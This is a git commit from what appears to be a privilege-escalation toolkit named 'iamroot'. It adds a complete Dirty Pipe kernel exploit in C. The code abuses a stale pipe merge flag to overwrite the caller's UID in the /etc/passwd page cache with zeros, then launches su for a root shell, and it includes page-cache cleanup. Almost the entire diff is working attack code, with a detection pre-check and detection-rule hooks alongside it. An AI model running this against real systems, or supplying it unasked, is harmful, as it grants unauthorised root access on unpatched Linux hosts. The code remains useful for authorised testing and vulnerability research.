Phase 2 complete: Dirty Pipe full exploit (page-cache UID flip → su)

- Implements the Dirty Pipe primitive: prepare_pipe() fills+drains a pipe to plant the stale PIPE_BUF_FLAG_CAN_MERGE flag in every pipe_buffer slot; dirty_pipe_write() splices 1 byte from the target file at offset-1 (seeding the slot with the file's page) then write()s the payload, which the buggy kernel merges back into the page cache. - find_passwd_uid_field() + revert_passwd_page_cache() inlined in the module. Two-of-two duplication acceptable; extraction into core/host triggers when a third module needs the same helpers (Phase 1.5). - dirty_pipe_exploit() resolves current euid via getpwuid, locates the user's UID field in /etc/passwd, replaces it with same-length zeros ('0000' for a 4-digit UID), then execlp's su <user> -c /bin/sh. Auto-refuses if detect() reports patched. --no-shell mode plants the write and returns. Cleanup mode evicts /etc/passwd from page cache. - _GNU_SOURCE redefine warning fixed: cmdline -D already passes it. Verified end-to-end on kernel 6.12.86 (patched): iamroot --scan → dirty_pipe reports OK (patched) iamroot --exploit dirty_pipe --i-know → refuses cleanly CI-validation against vulnerable kernel (Ubuntu 20.04 / 5.13) is Phase 4. CVES.md: dirty_pipe 🔵 → 🟢. ROADMAP.md: Phase 2 marked complete.
2026-05-16 20:02:02 -04:00
parent cee368d5a4
commit 5a0aef12d0
3 changed files with 249 additions and 15 deletions
@@ -34,8 +34,162 @@
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"

+/* _GNU_SOURCE is passed via -D in the top-level Makefile; do not
+ * redefine here (warning: redefined). */
+
 #include <stdio.h>
+#include <stdlib.h>
 #include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <pwd.h>
+
+/* ---- Dirty Pipe primitive ---------------------------------------- */
+
+/* Fill the pipe to the brim, then drain — the kernel marks every
+ * pipe_buffer slot with PIPE_BUF_FLAG_CAN_MERGE during the fill, and
+ * the bug is that this flag SURVIVES the drain. So when we splice() a
+ * file page in next, the slot inherits the merge flag and any
+ * subsequent write() to the pipe lands in the file's page cache. */
+static int prepare_pipe(int p[2])
+{
+    if (pipe(p) < 0) return -1;
+    int pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+    if (pipe_size < 0) pipe_size = 65536;
+    static char buf[4096];
+    for (int r = pipe_size; r > 0;) {
+        int n = r > (int)sizeof(buf) ? (int)sizeof(buf) : r;
+        ssize_t w = write(p[1], buf, n);
+        if (w < 0) return -1;
+        r -= w;
+    }
+    for (int r = pipe_size; r > 0;) {
+        int n = r > (int)sizeof(buf) ? (int)sizeof(buf) : r;
+        ssize_t rd = read(p[0], buf, n);
+        if (rd < 0) return -1;
+        r -= rd;
+    }
+    return 0;
+}
+
+/* Write `data_len` bytes into the page cache of `target_path` starting
+ * at byte `offset`. Constraints:
+ *   - offset must not be page-aligned (Dirty Pipe needs the splice's
+ *     1-byte at offset-1 to land in the same page as our write)
+ *   - data_len must fit in the page containing `offset`
+ *   - target_path must be readable by the caller
+ *   - target_path's file size must extend past `offset + data_len`
+ *     (Dirty Pipe can't extend files). */
+static int dirty_pipe_write(const char *target_path, off_t offset,
+                            const char *data, size_t data_len)
+{
+    if ((offset & 0xfff) == 0) {
+        fprintf(stderr, "[-] dirty_pipe_write: offset is page-aligned; refuse\n");
+        return -1;
+    }
+    size_t in_page = 4096 - (offset & 0xfff);
+    if (data_len > in_page) {
+        fprintf(stderr, "[-] dirty_pipe_write: writes cannot cross page boundary "
+                        "(have %zu, fits %zu)\n", data_len, in_page);
+        return -1;
+    }
+    int fd = open(target_path, O_RDONLY);
+    if (fd < 0) { perror("open target"); return -1; }
+
+    int p[2];
+    if (prepare_pipe(p) < 0) { close(fd); return -1; }
+
+    /* splice 1 byte from `offset - 1` to seed the pipe slot with the
+     * file's page (and inherit the stale CAN_MERGE flag). */
+    off_t splice_off = offset - 1;
+    ssize_t n = splice(fd, &splice_off, p[1], NULL, 1, 0);
+    if (n != 1) {
+        fprintf(stderr, "[-] splice failed (n=%zd, errno=%d)\n", n, errno);
+        close(fd); close(p[0]); close(p[1]); return -1;
+    }
+
+    /* Now write our payload. The kernel merges it into the file page. */
+    ssize_t w = write(p[1], data, data_len);
+
+    close(fd); close(p[0]); close(p[1]);
+    return (w == (ssize_t)data_len) ? 0 : -1;
+}
+
+/* ---- /etc/passwd UID-field helpers (inlined; would migrate to
+ *      core/host.{c,h} once a third module needs them). ------------ */
+
+/* Locate the UID field of `username` in /etc/passwd. Returns true on
+ * success and fills *uid_off (byte offset of UID), *uid_len (length
+ * of UID string), uid_str (copy of UID, NUL-terminated). Requires
+ * the UID to be a positive decimal number that fits in 16 bytes. */
+static bool find_passwd_uid_field(const char *username,
+                                  off_t *uid_off, size_t *uid_len,
+                                  char uid_str[16])
+{
+    int fd = open("/etc/passwd", O_RDONLY);
+    if (fd < 0) return false;
+    struct stat st;
+    if (fstat(fd, &st) < 0) { close(fd); return false; }
+    char *buf = malloc(st.st_size + 1);
+    if (!buf) { close(fd); return false; }
+    ssize_t r = read(fd, buf, st.st_size);
+    close(fd);
+    if (r != st.st_size) { free(buf); return false; }
+    buf[st.st_size] = 0;
+
+    /* find line "username:x:UID:GID:..." */
+    size_t ulen = strlen(username);
+    char *p = buf;
+    while (p < buf + st.st_size) {
+        char *eol = strchr(p, '\n');
+        if (!eol) eol = buf + st.st_size;
+        if (strncmp(p, username, ulen) == 0 && p[ulen] == ':') {
+            /* Skip past "username:" then password field */
+            char *q = p + ulen + 1;
+            char *pw_end = memchr(q, ':', eol - q);
+            if (!pw_end) goto next;
+            char *uid_begin = pw_end + 1;
+            char *uid_end = memchr(uid_begin, ':', eol - uid_begin);
+            if (!uid_end) goto next;
+            size_t L = uid_end - uid_begin;
+            if (L == 0 || L >= 16) goto next;
+            memcpy(uid_str, uid_begin, L);
+            uid_str[L] = 0;
+            *uid_off = (off_t)(uid_begin - buf);
+            *uid_len = L;
+            free(buf);
+            return true;
+        }
+    next:
+        p = eol + 1;
+    }
+    free(buf);
+    return false;
+}
+
+/* Evict /etc/passwd from page cache after exploitation. POSIX_FADV_DONTNEED
+ * works as a non-root hint; if it doesn't take, try `drop_caches` which
+ * requires root (which we just acquired). */
+static void revert_passwd_page_cache(void)
+{
+    int fd = open("/etc/passwd", O_RDONLY);
+    if (fd >= 0) {
+        posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
+        close(fd);
+    }
+    /* Belt-and-suspenders: drop_caches=3 wipes all page cache. Best-effort. */
+    int dc = open("/proc/sys/vm/drop_caches", O_WRONLY);
+    if (dc >= 0) {
+        if (write(dc, "3\n", 2) < 0) { /* ignore */ }
+        close(dc);
+    }
+}
+
+

 /* The bug exists on every kernel from 5.8 (introduction) until the
 * fix is backported to that branch. We model "patched" as:
@@ -96,16 +250,91 @@ static iamroot_result_t dirty_pipe_detect(const struct iamroot_ctx *ctx)
 }

 static iamroot_result_t dirty_pipe_exploit(const struct iamroot_ctx *ctx)
+{
+    /* Re-confirm vulnerability before writing to /etc/passwd. */
+    iamroot_result_t pre = dirty_pipe_detect(ctx);
+    if (pre != IAMROOT_VULNERABLE) {
+        fprintf(stderr, "[-] dirty_pipe: detect() says not vulnerable; refusing to exploit\n");
+        return pre;
+    }
+
+    /* Resolve current user. */
+    uid_t euid = geteuid();
+    struct passwd *pw = getpwuid(euid);
+    if (!pw) {
+        fprintf(stderr, "[-] dirty_pipe: getpwuid(%d) failed: %s\n", euid, strerror(errno));
+        return IAMROOT_TEST_ERROR;
+    }
+    if (euid == 0) {
+        fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
+        return IAMROOT_OK;
+    }
+
+    /* Find the UID field. Need a 4-digit-or-similar UID we can replace
+     * with "0000" of identical width. Refuse if the user's UID width
+     * doesn't fit our replacement string. */
+    off_t uid_off;
+    size_t uid_len;
+    char orig_uid[16] = {0};
+    if (!find_passwd_uid_field(pw->pw_name, &uid_off, &uid_len, orig_uid)) {
+        fprintf(stderr, "[-] dirty_pipe: could not locate %s's UID field in /etc/passwd\n",
+                pw->pw_name);
+        return IAMROOT_TEST_ERROR;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[*] dirty_pipe: user '%s' UID '%s' at offset %lld (len %zu)\n",
+                pw->pw_name, orig_uid, (long long)uid_off, uid_len);
+    }
+
+    /* Build replacement: zeros of the same length so we don't shift
+     * the line layout. "0000" for a 4-digit UID, "00000" for 5, etc. */
+    char replacement[16];
+    memset(replacement, '0', uid_len);
+    replacement[uid_len] = 0;
+
+    /* Edge case: if offset is page-aligned, splice/CAN_MERGE primitive
+     * can't reach it (see prepare_pipe/dirty_pipe_write comments).
+     * Vanishingly rare — first user in /etc/passwd typically lives
+     * far past the file's first 4096 bytes. Refuse cleanly. */
+    if ((uid_off & 0xfff) == 0) {
+        fprintf(stderr, "[-] dirty_pipe: UID field is page-aligned; primitive can't write here\n");
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] dirty_pipe: overwriting UID '%s' → '%s' via page-cache write\n",
+                orig_uid, replacement);
+    }
+    if (dirty_pipe_write("/etc/passwd", uid_off, replacement, uid_len) < 0) {
+        fprintf(stderr, "[-] dirty_pipe: page-cache write failed\n");
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (ctx->no_shell) {
+        fprintf(stderr, "[+] dirty_pipe: --no-shell — patch landed; not spawning su.\n"
+                        "[i] dirty_pipe: revert with `iamroot --cleanup dirty_pipe`\n");
+        return IAMROOT_EXPLOIT_OK;
+    }
+
+    /* /etc/passwd now reports our user as uid 0 (in the page cache).
+     * `su` reads the page cache, sees uid 0, drops a root shell. */
+    fprintf(stderr, "[+] dirty_pipe: page cache poisoned; spawning su to claim root\n");
+    fflush(NULL);
+    execlp("su", "su", pw->pw_name, "-c", "/bin/sh", (char *)NULL);
+    /* If execlp returns, su didn't actually pop root — revert and report. */
+    perror("execlp(su)");
+    revert_passwd_page_cache();
+    return IAMROOT_EXPLOIT_FAIL;
+}
+
+static iamroot_result_t dirty_pipe_cleanup(const struct iamroot_ctx *ctx)
 {
    (void)ctx;
-    fprintf(stderr,
-        "[-] dirty_pipe: exploit not yet implemented in IAMROOT.\n"
-        "    Status: 🔵 DETECT-ONLY (see CVES.md).\n"
-        "    The reference public PoC by Max Kellermann is well-documented;\n"
-        "    landing it under the iamroot_module interface is the next\n"
-        "    Phase 2 deliverable. For now, use --scan to detect, then run\n"
-        "    Max's reference PoC manually if you need to verify.\n");
-    return IAMROOT_PRECOND_FAIL;
+    if (!ctx->json) {
+        fprintf(stderr, "[*] dirty_pipe: evicting /etc/passwd from page cache\n");
+    }
+    revert_passwd_page_cache();
+    return IAMROOT_OK;
 }

 /* Embedded detection rules — keep the binary self-contained so
@@ -145,7 +374,7 @@ const struct iamroot_module dirty_pipe_module = {
    .detect         = dirty_pipe_detect,
    .exploit        = dirty_pipe_exploit,
    .mitigate       = NULL,
-    .cleanup        = NULL,
+    .cleanup        = dirty_pipe_cleanup,
    .detect_auditd  = dirty_pipe_auditd,
    .detect_sigma   = dirty_pipe_sigma,
    .detect_yara    = NULL,